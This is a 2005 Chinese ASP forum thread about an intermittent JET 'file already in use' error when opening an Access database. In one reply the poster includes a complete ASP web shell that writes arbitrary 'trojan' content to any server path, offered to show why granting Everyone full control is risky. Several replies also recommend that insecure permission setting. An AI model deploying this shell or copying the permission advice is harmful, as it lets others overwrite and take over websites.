Microsoft JET Database Engine 错误 '80004005'

522010000 2005-03-16 02:47:18
web偶尔会出现下面的错误(大多数情况下都是好的),在线等.


Microsoft VBScript 编译器错误 错误 '800a03f6'

缺少 'End'

/iisHelp/common/500-100.asp,行242

Microsoft JET Database Engine 错误 '80004005'

不能使用 '';文件已在使用中。

/inc/conn.asp,行8

<%
dim conn
dim connstr
dim db
db="database/db.mdb" '数据库文件的位置
Set conn = Server.CreateObject("ADODB.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr<<<<<<--第八行

sub CloseConn()
conn.close
set conn=nothing
end sub
%>

...全文
553 19 打赏 收藏 转发到动态 举报
写回复
用AI写文章
19 条回复
切换为时间正序
请发表友善的回复…
发表回复
522010000 2005-03-18
  • 打赏
  • 举报
回复
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "<br>" %>
<% Response.write "输入马的内容:" %>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
522010000 2005-03-18
  • 打赏
  • 举报
回复
我又把web文件夹的everyone权限设成完全控制了,
好象暂时没出现什麽问题.
但是安全上面又会出现很多问题.
因为我同时给其他的人提供web服务.
如果web文件夹的everyone权限设成完全控制,
其他人可通过下面的代码更改我的主页.
不知道有没有那位兄弟能帮我解决这个问题.
522010000 2005-03-18
  • 打赏
  • 举报
回复
没人理我.
cncca 2005-03-17
  • 打赏
  • 举报
回复
看来问题已解决!闪~
zhanglemail 2005-03-17
  • 打赏
  • 举报
回复
如果是access数据库,在NTFS分区下,可能你没有写的权限;解决,找到数据库文件-->单击右键-->属性-->安全-->everyone权限设为完全控制;
jordan1 2005-03-17
  • 打赏
  • 举报
回复
我把web所在文件夹的安全中把everyone的写入修改的权限给删了会不会有影响.


应该就是这问题了,我也出现这问题查以前的贴子,别人就说什么every写入问题。但是我找不到在哪改啊,楼主能告诉我改的详细步骤吗?谢谢!
ChiliHot 2005-03-17
  • 打赏
  • 举报
回复
你使用的是windows 2003吧!

可以这样试试:

<%
on error resume next
dim conn
dim connstr
dim db
db="database/db.mdb" '数据库文件的位置
Set conn = Server.CreateObject("ADODB.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr<<<<<<--第八行

if err.number <> 0 then
Set Application("conn") = Server.CreateObject("ADODB.Connection")
set conn = Application("conn")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr<<<<<<--第八行
end if

sub CloseConn()
conn.close
set conn=nothing
end sub
%>
522010000 2005-03-17
  • 打赏
  • 举报
回复
没人理我.
522010000 2005-03-16
  • 打赏
  • 举报
回复
我把web所在文件夹的安全中把everyone的写入修改的权限给删了会不会有影响.
baikaishui_0825 2005-03-16
  • 打赏
  • 举报
回复
这样吧,修复一下数据库吧
步骤如下:
修复之前先备份数据库--打开db.mdb--工具--数据库使用工具--压缩和修复数据库
ccxxcc 2005-03-16
  • 打赏
  • 举报
回复
是不是有代码没有
conn.close
set conn = nothing
孟子E章 2005-03-16
  • 打赏
  • 举报
回复
http://support.microsoft.com/kb/174943
孟子E章 2005-03-16
  • 打赏
  • 举报
回复
http://support.microsoft.com/default.aspx?scid=kb;zh-tw;306518

http://support.microsoft.com/default.aspx?scid=kb;zh-cn;306518
522010000 2005-03-16
  • 打赏
  • 举报
回复
应该关了,
用了差不多半年,
一直没出问题,
只是最近重装了系统.

而且也不是每次都出问题.
xiaozx 2005-03-16
  • 打赏
  • 举报
回复
文件已在使用中。关了就可以了
yiran700 2005-03-16
  • 打赏
  • 举报
回复
同上
thor 2005-03-16
  • 打赏
  • 举报
回复
conn没有关掉……
如果你不能确认,那么加上on error resume next
或者if conn.state=1 then conn.close
myvicy 2005-03-16
  • 打赏
  • 举报
回复
可能你正在打开这个db.mdb文件。关掉就没事了。
baikaishui_0825 2005-03-16
  • 打赏
  • 举报
回复
在运行的时候不要打开db.mdb

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧